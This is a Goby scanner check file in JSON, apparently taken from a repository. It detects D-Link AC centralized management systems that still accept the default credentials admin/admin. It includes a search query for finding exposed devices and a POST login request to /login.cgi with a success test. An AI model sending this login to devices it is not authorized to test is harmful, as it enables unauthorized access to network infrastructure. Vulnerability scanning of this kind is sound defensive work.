Goby/json/Hsmedia_Hgateway_Default_ac...

55 lines
2.1 KiB
JSON

{
"Name": "D-Link AC Centralized management system Default weak password",
"Level": "2",
"Tags": [
"Default weak password"
],
"GobyQuery": "title=\"AC集中管理平台\" && body=\"D-Link路由器管理页\" && app=\"DLink-Router\"",
"Description": "D-Link AC management system has default account password, which can be used to obtain sensitive information (admin/admin)",
"Product": "D-Link AC management system",
"Homepage": "http://www.dlink.com.cn/",
"Author": "PeiQi",
"Impact": "<p>Access to sensitive information<br></p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/login.cgi",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "user=admin&password=admin"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "not contains",
"value": "flag=0",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-04-04 21:13:54",
"GobyVersion": "1.8.255"
}